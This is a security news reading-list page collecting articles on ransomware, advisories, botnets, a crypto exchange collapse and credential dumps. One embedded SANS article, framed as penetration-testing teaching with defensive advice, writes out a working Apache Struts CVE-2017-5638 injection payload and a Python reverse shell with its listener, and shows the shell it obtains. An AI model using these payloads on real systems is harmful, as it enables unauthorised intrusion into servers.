About The Reading List

To keep current on threats and what they mean to businesses, I read a lot of sources every day. So I had the idea, why not share our reading list with everyone. So this page is dedicated to the never ending collection of articles that I think are important.

Mail Attachment Builds Ransomware Downloader from Super Mario Image

Read Full Article

Mario Header

A malicious spreadsheet has been discovered that builds a PowerShell command from individual pixels in a downloaded image of Mario from Super Mario Bros. When executed, this command will download and install malware such as the GandCrab Ransomware and other malware.

This attack works when recipients receive an email targeting people from Italy that pretends to be payment notices.

Example Spam Email
Example Spam Email

These emails contain an attachment with names similar to “F.DOC.2019 A 259 SPA.xls” that when opened tell the user to Enable Content in order to properly view the document.

Malicious spreadsheet attachment
Malicious spreadsheet attachment

Once the content is enabled, its macros will be triggered that check if the computer is configured to use the Italy region. If not, it will exit the spreadsheet and nothing else happens.

Macro checking if computer is in Italy
Macro checking if computer is in Italy

If they are located in Italy, though, the following image of Mario is downloaded. The image below has been slightly modified so that it cannot be used for malicious purposes.

Download image of Mario
Download image of Mario

According to researchers from Bromium who analyzed this attack, after the image is downloaded the script will extract various pixels from the image to reconstruct a PowerShell command, which will then be executed.

“The above code is finding the next level of code from the blue and green channel from pixels in a small region of the image,” stated Bromium’s research. “The lower bits of each pixel are used as adjustments to these and yield minimal differences to the perceived image. Running this presents yet more heavily obfuscated PowerShell”

This PowerShell command will download malware from a remote site, which then downloads further malware such as the GandCrab Ransomware.

GandCrab Ransom Note
GandCrab Ransom Note

Steganographic attacks are not new and are being used more often to avoid detection by security programs. Just recently a malvertising campaign was discovered by Malwarebytes that was utilizing steganography to install a payload hidden in advertising images.

As always, it is is very important to be careful when it comes to attachments as they are a heavily used method to distribute malware. To be safe, always scan attachments you receive before you open them and be doubly suspicious if they contain macros that need to be enabled to properly view the document.

Read Full Article

NSA Releases Updated Guidance on Side-Channel Vulnerabilities

Read Full Article
Original release date: February 01, 2019

The National Security Agency (NSA) has released updated information on a set of side-channel vulnerabilities affecting modern computer processors. An attacker can exploit these vulnerabilities to obtain sensitive information.

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the NSA Cybersecurity Advisory on Updated Guidance for Vulnerabilities Affecting Modern Processors and Hardware and Firmware Security Guidance GitHub website for more information and updated mitigations.

This product is provided subject to this Notification and this Privacy & Use policy.

Read Full Article

DHS Cyber Hunt Teams to Be Authorized by Reintroduced Bipartisan Bill

Read Full Article

The bipartisan Department of Homeland Security (DHS) Cyber Hunt and Incident Response Teams Act which would require the DHS to make permanent the “cyber incident response” and “cyber hunt” teams was reintroduced on January 31.

The S.315 bill that senators Rob Portman (R-OH) and Maggie Hassan (D-NH) reintroduced would “help prevent cyber attacks on federal agencies and the private sector, and help mitigate the impact of such attacks when they occur.”

DHS cyber response teams that would be codified in the law if the bill will pass, would be of vital importance for federal agencies, critical infrastructure, as well as key private sector partners to be able to fend off threats and address cyber challenges coming from cyber criminals and cyber terrorists.

“Our cyber response teams play an important role in protecting against cyber threats and help get our cyber infrastructure back up and running after an attack occurs,” said Senator Portman. “I look forward to working with my colleagues in the Senate to pass this bipartisan legislation to ensure that DHS has the authorities it needs to effectively reduce cybersecurity risks.” 

The Senators were also behind the Hack DHS Act

The two senators have previously worked on other bipartisan bills, namely the Hack Department of Homeland Security (DHS) Act and the Public-Private Cybersecurity Cooperation Act as part of a package of bills that were signed into law on December 21, 2018.

Moreover, the Hack DHS Act sets in place a bug bounty pilot program, similar to already ongoing Department of Defense and major tech companies programs, which compensates ethical hackers for identifying vulnerabilities in the DHS networks and computing tech.

The second law, the Public-Private Cybersecurity Cooperation Act, is designed to supplement the Hack DHS Act by requiring DHS to start a security vulnerabilities disclosure program allowing for security issues found in DHS’ systems to be fixed in a timely manner. 

“By encouraging the private sector and the Department of Homeland Security’s cyber response teams to work together, this legislation will foster collaboration between the best minds in the field of cybersecurity to help fend off cyberattacks and protect vital infrastructure,” Senator Hassan stated. “I appreciate Senator Portman’s continued partnership in our bipartisan efforts to strengthen our country’s cyber defenses and protect the homeland.” 

The bill text not yet available on the U.S. Congress website

The DHS Cyber Hunt and Incident Response Teams Act‘s text is not yet available on the U.S. Congress website, but this is not out of the ordinary:

As of 02/01/2019 text has not been received for S.315 – A bill to authorize cyber hunt and incident response teams at the Department of Homeland Security, and for other purposes. 

Bills are generally sent to the Library of Congress from GPO, the Government Publishing Office, a day or two after they are introduced on the floor of the House or Senate. Delays can occur when there are a large number of bills to prepare or when a very large bill has to be printed.

Although the bill’s text is not yet available, as detailed in the text of the previously introduced S. 3309, a bill which died in the 115th Congress, the DHS would have to make the cyber hunt and incident response teams responsible for:

(A) assistance to asset owners and operators in restoring services following a cyber incident;

(B) identification of cybersecurity risk and unauthorized cyber activity;

(C) mitigation strategies to prevent, deter, and protect against cybersecurity risks;

(D) recommendations to asset owners and operators for improving overall network and control systems security to lower cybersecurity risks, and other recommendations, as appropriate;

Read Full Article

Scanning for WebDAV PROPFIND Exploiting CVE-2017-7269, (Sat, Feb 2nd)

Read Full Article

Over the last several months, I have noticed more scans for WebDAV PROPFIND showing up in my honeypot. This is likely an attempt to exploit and launch calc.exe on the server to test if the web extension exist and can be exploited. The scans have a very basic and non-standard header:

An example of the output you might see in your webserver logs would look like this:

This is a Windows Server 2003 server exploit which hasn’t had any support since July 2015. According to Shodan, as of today, there are still 520,270 accessible IIS 6.0 servers on the Internet, this does not include all those air-gap server still in service.

Fortunately, most 2003 servers don’t have WebDAV functionality enable but that is still a concern that so many 2003 servers are still online and have not been patched for more than 3+ years. There is a proof of concept python script located here and that can be used to test and exploit WebDAV. If successful, it will launch calc.exe. According to this write up[5], the script’s payload is set up with a return-programming chain to use the overflow 3 times.

[1] http://bit.ly/2S8lgaB
[2] http://bit.ly/2UDyQje
[3] http://bit.ly/2ScXnz3
[4] http://bit.ly/2noXW4s
[5] http://bit.ly/2S8yzrJ

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://bit.ly/2ruEGKc Creative Commons Attribution-Noncommercial 3.0 United States License.

Read Full Article

FBI burrowing into North Korea’s big bad botnet

Read Full Article

The US has infiltrated, mapped, and poked a stick into the spokes of Joanap: what it claims is a botnet of hijacked Microsoft Windows computers operated by botnet masters in North Korea.

The Feds are also continuing to mess with the globe-spanning network by notifying the owners of the commandeered systems Joanap still controls, years after it was first discovered and in spite of antivirus software being able to fend it off.

The US Department of Justice (DOJ) announced on Wednesday that the effort follows charges, unsealed in September 2018, against a North Korea regime-backed programmer, Park Jin Hyok.

The botnet behind some big baddies

The complaint against Park alleged that he and his co-conspirators used a Server Message Block (SMB) worm commonly known as Brambul to gain unauthorized access to computers, and then used those computers to carry out a mess of big, nasty cyberattacks.

Among them were the global WannaCry ransomware attack of 2017, the 2014 attack on Sony Pictures, and the $81m cyber heist from 2016 that drained Bangladesh’s central bank.

The complaint alleged that Park, a North Korean citizen, was a member of a government-sponsored hacking team known as the “Lazarus Group” and that he worked for a North Korean government front company, Chosun Expo Joint Venture (aka Korea Expo Joint Venture or “KEJV”), to support cyber actions on behalf of the Democratic People’s Republic of Korea (DPRK).

Lazarus Group, also known as Guardians of Peace or Hidden Cobra, is a well-known cybercriminal group. In June 2017, US-CERT took the highly unusual step of sending a stark public warning to businesses about the danger of North Korean cyberattacks and the urgent need to patch old software to defend against them.

It specifically called out Lazarus Group. The alert was unusual in that it gave details, asking organizations to report any detected activity from Lazarus Group/Hidden Cobra/Guardians of Peace to the US Department of Homeland Security (DHS).

Specifically, US-CERT told organizations to be on the lookout for DDoS botnet activity, keylogging, remote access tools (RATs), and disk wiping malware, as well as SMB worm malware like WannaCry.

Hidden Cobra, crouching warrants

As US-CERT detailed in a May 2018 alert, the Joanap RAT is a so-called “second-stage” malware that’s often spread by the “first-stage” Brambul malware.

Once installed on a system, Joanap allows what the US claims are its North Korean overlords to remotely access computers, gain root-level access to infected computers, and load additional malware.

Joanap-infected computers – known as peers or bots – then get lassoed into the botnet. The Joanap botnet uses a decentralized peer-to-peer (P2P) setup to communicate, rather than a centralized command-and-control domain. …

… A fact that came into play when getting a court order and search warrant granted by a California court in October, which gave the FBI and the US Air Force Office of Special Investigations (AFOSI) the go-ahead to operate servers that pretended to be peers in the botnet.

That way, the FBI’s imposter peers could collect what prosecutors said was “limited identifying and technical information about other peers infected with Joanap,” including IP addresses, port numbers, and connection timestamps.

The FBI and AFOSI used that information to build a map of the Joanap botnet’s infected computers.

The reason we’re hearing about this now, as opposed to when the warrant was granted in October, is that the court gave the FBI permission to delay service of the warrant until last week, on Wednesday, due to the flight from justice or tampering/destruction of evidence that would very likely have been triggered otherwise.

Read Full Article

Cryptocurrency Firm Losses $145 Million After CEO Dies With Only Password

Read Full Article


the largest bitcoin exchange in Canada, has claimed to have lost CAD 190 million (nearly USD 145 million) worth of cryptocurrency after the exchange lost access to its cold (offline) storage wallets.

Reason? Unfortunately, the only person with access to the company’s offline wallet, founder of the cryptocurrency exchange, is dead.

Following the sudden death of

Gerry Cotten

, founder and chief executive officer QuadrigaCX, the Canadian exchange this week filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates and secures access to the lost funds.

In a sworn affidavit filed by Cotten’s widow Jennifer Robertson and obtained by


, Robertson said QuadrigaCX owes its customers some CAD 260 million (USD 198 Million) in both cryptocurrencies, including Bitcoin, Bitcoin Cash, Litecoin, and Ethereum, as well as fiat money.

However, Robertson said the cryptocurrency exchange only has smaller amount in a ‘hot wallet’ (USD 286,000), claiming that to protect its users funds from hackers, majority of coins were kept in a ‘cold wallet’—a physical device that is not connected to the internet—by Cotten, who died of Crohn’s disease on December 9 in Jaipur, India.

According to the affidavit, the exchange’s offline wallet holds roughly:

  • 26,500 Bitcoin (USD 92.3 million)
  • 11,000 Bitcoin Cash (USD 1.3 million)
  • 11,000 Bitcoin Cash SV (USD 707,000)
  • 35,000 Bitcoin Gold (USD 352,000)
  • 200,000 Litecoin (USD 6.5 million)
  • 430,000 Ether (USD 46 million)

Cotten was the only person who had the private keys to the wallet, according to Robertson, and no other members of the team, including herself, has the password to decrypt it.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website, which is down.

Exit Scam? Researchers Believe QuadrigaCX Never Had $100 Million

Some users and researchers have been doubtful of the exchange’s claims, with a leading cryptocurrency researcher, claiming that QuadrigaCX never had access to such a pool of funds and probably lying about having cold wallet reserves, suggesting the incident could be an exit scam.

Crypto Medication, a researcher and data analyzer, performed in-depth blockchain analysis of the QuadrigaCX’s Bitcoin Holdings by examining TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” the researcher wrote.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

Some other


are also reporting that moving of some of the funds in question after the case was publicized and the strange circumstances of Cotten’s death suggest that his death is either faked or the pretext for an exit scam by parties with access to the funds, according to



“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” bitcoin analyst Peter Todd said. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

A bankruptcy hearing for the cryptocurrency exchange is scheduled for February 5 at Nova Scotia Supreme Court, with international accounting firm Ernst and Young Inc. to be appointed as an independent monitor.

However, if the exchange has indeed placed its cryptocurrency in a now-inaccessible physical device, it is likely that thousands of its users would never be able to recover their funds and investments.

Read Full Article

Struts Vulnerability CVE-2017-5638 on VMware vCenter – the Gift that Keeps on Giving, (Mon, Feb 4th)

Read Full Article

All too often when doing an internal security assessment or penetration test, a simple NMAP scan will find back-end infrastructure such as RADIUS servers, Hypervisors, iLo, iDRAC and other BMC host addresss – essentially the parts of the datacenter that real people shouldn’t need access to.

At which point, the heart to heart with your client should be "really, why exactly does "Steve in Accounting" have access to your hypervisor? (ESXi, vCenter console, Hyper-V or whatever?)   It’s an even better point to make when you can make those connections from the Guest Wireless network.

The next conclusion should be – wait a minute!  After a quick check with a browser, that version and patch level of vCenter that we just found has a Remote Code Execution (RCE) vulnerability – the Apache Struts vulnerability CVE-2017-5638 – – remember the Equifax breach?  The Canadian Revenue Agency?  I could go on, the list is pretty lengthy.  All too often we see Windows hosts being patched at a reasonable rate, but internal management infrastructure like VMware vCenter, BMC controllers, routers, switches and firewalls get patched annually, or maybe just when they are installed and then never again.  Even though you can patch most "N+1"  Hypervisor environments without impacting service.  This leaves the client open to a plethora of default credentials and "old CVE" type vulnerabilities.  
In the case of vCenter, we can exploit the host with a simple curl command:

curl -v -k https://vSphereIP/statsreport/ -H "Content-Type: $(cat <<"EOF"
${(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’evil command goes here’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Replace "vSphereIP" with your target host ip or dns name, and "evil command goes here" with your evil command.

Let’s take things one step further – referencing Mark Baggett’s most excellent one line reverse shell:

Using the Struts vulnerability I wasn’t able to get everything escaped out correctly, so I broke it into 3 injected commands.  In this example, the vCenter server is at, the attacker is a Linux host at  The callback host is the attacker, but it could just as easily be a $evilserver on the public internet.
The first two injected commands create a python file:

echo import socket;import subprocess ;s=socket.socket() ;s.connect(("",9000)) > %temp%/rshell.py
echo while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read()) >>%temp%/rshell.py

The third command executes the file:

python %temp%/rshell.py

The full sequence of commands as executed on the Linux host are:
first, on the target for the reverse shell (on your internet $evilserver) set up the listener:

evilserver# nc -l -p 9000

Next, from your attacking host, create the python script on the vCenter server:

curl -v -k http://bit.ly/2TB7KJD -H "Content-Type: $(cat <<"EOF"
${(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd = ‘echo import socket;import subprocess ;s=socket.socket() ;s.connect(("",9000)) > %temp%/rshell.py’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

curl -v -k http://bit.ly/2TB7KJD -H "Content-Type: $(cat <<"EOF"
${(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd = ‘echo while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read()) >>%temp%/rshell.py’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Finally, run your script on the vCenter host:

curl -v -k http://bit.ly/2TB7KJD -H "Content-Type: $(cat <<"EOF"
${(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd = ‘python %temp%/rshell.py’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

After which we have a full shell on our listening $evilserver:

root@kali:~# nc -l -p 9000
nt service\vmware-perfcharts
Volume in drive C has no label.
Volume Serial Number is DCD1-1A36

Directory of C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin

  1. 12:49 PM <DIR> .
    12:49 PM <DIR> ..
    04/10/2015 11:57 AM 1,121 heapsize_wrapper.bat
    04/10/2015 11:57 AM 4,473 InstallPerfCharts.bat
    04/10/2015 11:57 AM 4,475 QueryPerfCharts.bat
    04/10/2015 11:57 AM 4,475 StartPerfCharts.bat
    04/10/2015 11:57 AM 4,475 StopPerfCharts.bat
    04/10/2015 11:57 AM 4,475 UninstallPerfCharts.bat
    04/10/2015 11:57 AM 629,016 wrapper.exe
    7 File(s) 652,510 bytes
    2 Dir(s) 14,066,507,776 bytes free

Microsoft Windows [Version 6.3.9600]

At this point you have a shell, not a terminal.  This means that an interactive powershell session won’t work, but WMIC commands will work, as well as anything else that’ll run in a shell rather that a TTY:

wmic qfe list brief
Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
Update KB2919355 VC\Administrator 3/21/2014
Update KB2919442 VC\Administrator 3/21/2014
Update KB2937220 VC\Administrator 3/21/2014
Update KB2938772 VC\Administrator 3/21/2014
Update KB2939471 VC\Administrator 3/21/2014
Hotfix KB2949621 VC\Administrator 3/21/2014

So will executing a fully formed PowerShell script (you’ll likely need to bypass the execution policy though)

Would this have worked on the vCenter virtual appliance?  You Betcha!  The script to exploit the Struts vulnerability has a nifty OS detection thing – it’ll work on pretty much any popular OS that supports Struts.  We would have had to modify the host firewall to allow the outbound tcp/9000 first on a virtual appliance vCenter though.

So where do we go from here?  First of all, before running any of the fun ‘sploits-n-shells stuff, you need to contact your client and get permission – messing around with vSphere in a penetration test is most often something folks are NOT on-board with.   Most often, after detection I’ll get permission to run the rest of this exercise in my lab, using the save versions of vSphere and vCenter that the client is running (hint – you can easily stand ESXi and vCenter up inside of VMware Workstation).

Now that we have a shell, what can we do?  Well, pretty much anything, up to an including exfiltrating entire virtual disks, or the whole VM if that makes the point better in your penetration test (you’ll need some privilege escallation first for that – you are starting with NT SERVICE rights – the virtual account is "NT SERVICE\vmware-perfcharts").  

Again, if you get this far on a production server, you DEFINITELY need permission to exfiltrate a VM (or any portion thereof) – odds are vanishingly small that you’ll get permission to exfiltrate it, or if you do, it’ll be to a machine inside the firewall that’s under your client’s control.

Other products that are vulnerable?
There are other vendor products that are vulnerable – Cisco for instance has a complete list here – most major vendors have their own list for this specific issue:
The product that I see most often in penetration tests (besides vCenter) is Cisco Identity Services Engine (ISE) – this is a fun one to exploit, since that’s normally where you see 802.1x authentication of users and workstations for wired and especially wireless access happen.

Cool exploit, but the findings in the report shouldn’t have anything to do with the exploit, the specific patch or stealing virtual machines or credentials from wireless sessions.  What should your client consider to protect against something like this?

Most importantly, for prevention:
An accurate OS and Software inventory should be maintained across the enterprise (CIS Critical Controls 1 & 2)

A patching schedule should be maintained for Servers, Workstations and Critical Infrastructure, then you should be meeting that schedule as part of  your regular IT operations (CIS Critical Control 3).  You want to patch these as they come up, or else it’s easy to forget to come back to them later – putting these off tends to lead to vulnerabilities in the dusty corners of your infrastructure that fester for years, or until an internal assessment or pentest shines a light on them.

Administrative hosts such as vCenter, ESXi hosts and similar should be on a dedicated network segment (CIS Critical Controls 9,14), which should be firewalled away from user networks and most server networks (CIS Critical Controls 9,11,12) .  All too often the receptionist has network reachability to these hosts (as do unattended ethernet ports in the meeting rooms or the wireless SSID that has the easily cracked or recovered pre-shared key).

You’ll likely want several "admin / infrastructure" network segments.  Likely you don’t want your BMC (iLo, iDRAC or other server admin consoles) on the same segment as anything for instance.
Even without segmentation, lots of infrastructure will have an integrated firewall (ESXi, vCenter, most network infrastructure just to start), so that only known administrative stations can access them – these should be configured where possible (CIS Critical Controls 3,5,7,9,11)
F‌inally, admin logins should be logged.  In many cases, admin logins outside of backup or change windows should generate alerts (admin logins to routers, switches should be infrequent enough for that, often firewalls too for instance).

For detection:
Your IPS will definitely catch this attack, but if it’s an HTTPS site (which it almost always is), ONLY if you are decrypting that flow.  Also, your IPS needs to be able to "see" the traffic.  If this attack is from an internal server or workstation to a target server, your IPS may not "see" this at all.  If it is in line though, and it is decrypting, then Snort for instance will catch this using one of the following SIDs:

(1:41818) SERVER-APACHE Apache Struts remote code execution attempt
(1:41819) SERVER-APACHE Apache Struts remote code execution attempt
(1:41922) SERVER-APACHE Apache Struts remote code execution attempt
(1:41923) SERVER-APACHE Apache Struts remote code execution attempt

Logs on vulnerable server have a shot at catching this also, but in most cases, don’t hold your breath.  You don’t usually have the full component logs for larger apps that use sub-components like Struts.

Scanning (Hunting):
Scanning for this vulnerability "on the wire" can be problematic.  NMAP has a script for this, but you need the exact path to the vulnerable part of the site, which will very from product to product, site by site.    

nmap.exe -p 443 –script http-vuln-cve2017-5638 –script-args path=/statsreport

Starting Nmap 7.70 ( http://bit.ly/2BhULVK ) at 2019-01-21 19:11 EDT
Nmap scan report for
Host is up (0.00s latency).
443/tcp open https
MAC Address: 00:0C:29:C3:4D:9D (VMware)
| http-vuln-cve2017-5638:
| Apache Struts Remote Code Execution Vulnerability
| IDs: CVE:CVE-2017-5638
| Description:
| Apache Struts 2.3.5 – Struts 2.3.31 and Apache Struts 2.5 – Struts 2.5.10 are vulnerable to a Remote Code Execution
| vulnerability via the Content-Type header.
| Disclosure date: 2017-03-07
| References:
| http://bit.ly/2Tu4ek4
| http://bit.ly/2BlzryP
|_ http://bit.ly/2TwLeBp

But if you don’t know the vulnerable path, you won’t get a hit:

nmap -p 443 –open –script http-vuln-cve2017-5638
Starting Nmap 7.70 ( http://bit.ly/2Bj0cUt ) at 2019-01-21 19:09 EST
Nmap scan report for
Host is up (0.00035s latency).

443/tcp open https
MAC Address: 00:0C:29:C3:4D:9D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

Tools like Nessus will do a better job, but if you’re using Nessus, an authenticated scan is the way to go.  This will list out all the products in play on each host, any missing patches and Nessus’s idea of the priority.  From that you can piece together the real vulnerabilities that you have in play and put a plan together for patching. Be prepared for a LOT more information than you need from a scan like this – you’ll need to winnow through lots of duplicate and superflous information to come up with your "do this" plan.

Really, inventory, patching and network segmentation are what’s going to save your bacon for most "well known" vulnerabilties of this type.  Authenticated Scanning will help the most with planning.  If your IPS is seeing this traffic on the inside, you might be too late (or not, maybe the malware that’s trying this exploit isn’t too smart).

Looking for more info?
To dig further into Python, look to any number of how-to sites, starting with http://bit.ly/2TxeIPM, or for a more "evil" perspective, consider taking SANS SEC573: Automating Information Security with Python – https://www.sans.org/course/automating-information-security-with-python
For the attacker / defender points of view of VMware and other Private Cloud infrastructures, look to SEC579: Virtualization and Software-Defined Securityhttps://www.sans.org/course/virtualization-and-software-defined-security
Your specific product will likely have a vendor hardening guide or other security guidance, often you’ll find a CIS Benchmark for securing your configuration as well (vCenter has both): https://www.cisecurity.org/cis-benchmarks/
And of course, the CIS Critical Controls: https://www.cisecurity.org/controls/

Rob VandenBrink

(c) SANS Internet Storm Center. http://bit.ly/2ruEGKc Creative Commons Attribution-Noncommercial 3.0 United States License.

Read Full Article

AA19-024A: DNS Infrastructure Hijacking Campaign

Read Full Article
Original release date: January 24, 2019


The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization’s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization’s domain names, enabling man-in-the-middle attacks.

See the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:

These files will be updated as information becomes available.

Technical Details

Using the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.

  1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.
  2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.
  3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization’s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.


NCCIC recommends the following best practices to help safeguard networks against this threat:

  • Update the passwords for all accounts that can change organizations’ DNS records.
  • Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.
  • Audit public DNS records to verify they are resolving to the intended location.
  • Search for encryption certificates related to domains and revoke any fraudulently requested certificates.



  • January 24, 2019: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Read Full Article

New Exploit Threatens Over 9,000 Hackable Cisco RV320/RV325 Routers Worldwide

Read Full Article

If the connectivity and security of your organization rely on Cisco RV320 or RV325 Dual Gigabit WAN VPN routers, then you need to immediately install the latest firmware update released by the vendor last week.

Cyber attackers have actively been exploiting two newly patched high-severity router vulnerabilities in the wild after a security researcher released their

proof-of-concept exploit

code on the Internet last weekend.

The vulnerabilities in question are a command injection flaw (assigned CVE-2019-1652) and an information disclosure flaw (assigned CVE-2019-1653), a combination of which could allow a remote attacker to take full control of an affected Cisco router.

The first issue exists in RV320 and RV325 dual gigabit WAN VPN routers running firmware versions through, and the second affects firmware versions and, according to the

Cisco’s advisory


Both the vulnerabilities, discovered and responsibly reported to the company by German security firm RedTeam Pentesting, actually resides in the web-based management interface used for the routers and are remotely exploitable.

  • CVE-2019-1652—The flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands on the system.
  • CVE-2019-1653—This flaw doesn’t require any authentication to reach the router’s web-based management portal, allowing attackers to retrieve sensitive information including the router’s configuration file containing MD5 hashed credentials and diagnostic information.

The PoC exploit code targeting Cisco RV320/RV325 routers published on the Internet first exploits CVE-2019-1653 to retrieve the configuration file from the router to obtain its hashed credentials and then exploits CVE-2019-1652 to execute arbitrary commands and gain complete control of the affected device.

Researchers from cybersecurity firm

Bad Packets

said they found at least 9,657 Cisco routers (6,247 RV320 and 3,410 RV325) worldwide that are vulnerable to the information disclosure vulnerability, most of which located in the United States.

The firm shared an

interactive map

, showing all vulnerable RV320/RV325 Cisco routers in 122 countries and on the network of 1,619 unique internet service providers.

Bad Packets said its honeypots detected opportunistic scanning activity for vulnerable routers from multiple hosts from Saturday, suggesting the hackers are actively trying to exploit the flaws to take full control of the vulnerable routers.

The best way to protect yourself from becoming the target of one such attack is to install the latest Cisco RV320 and RV325

Firmware release

as soon as possible.

Administrators who have not yet applied the firmware update are highly recommended to change their router’s admin and WiFi credentials considering themselves already compromised.

Read Full Article

Credential dump contains another 2.2 billion pwned accounts

Read Full Article

How many user credentials have fallen into the hands of criminals during a decade of data breaches?

Earlier this month, the Have I Been Pwned? (HIBP) website offered a partial answer to that question by uploading something called Collection #1, a database of 773 million unique email addresses discovered circulating on a criminal forum.

Now researchers at Germany’s Hasso-Plattner Institute (HPI) have reportedly analysed a second cache that was part of the same discovery. This cache consists of four collections named, unsurprisingly, Collections #2-5, that they think contains a total of 2.2 billion unique pairs of email addresses and passwords.

Collection #1 consists 87GB of data cobbled together from more than 2,000 individual data breaches going back years.

Collections #2-5, for comparison, is said to be 845GB covering 25 billion records.

It’s a dizzying volume of data, which, despite the hundreds of millions or more people it must represent, is still small enough to fit on the hard drive of a recent Windows computer.

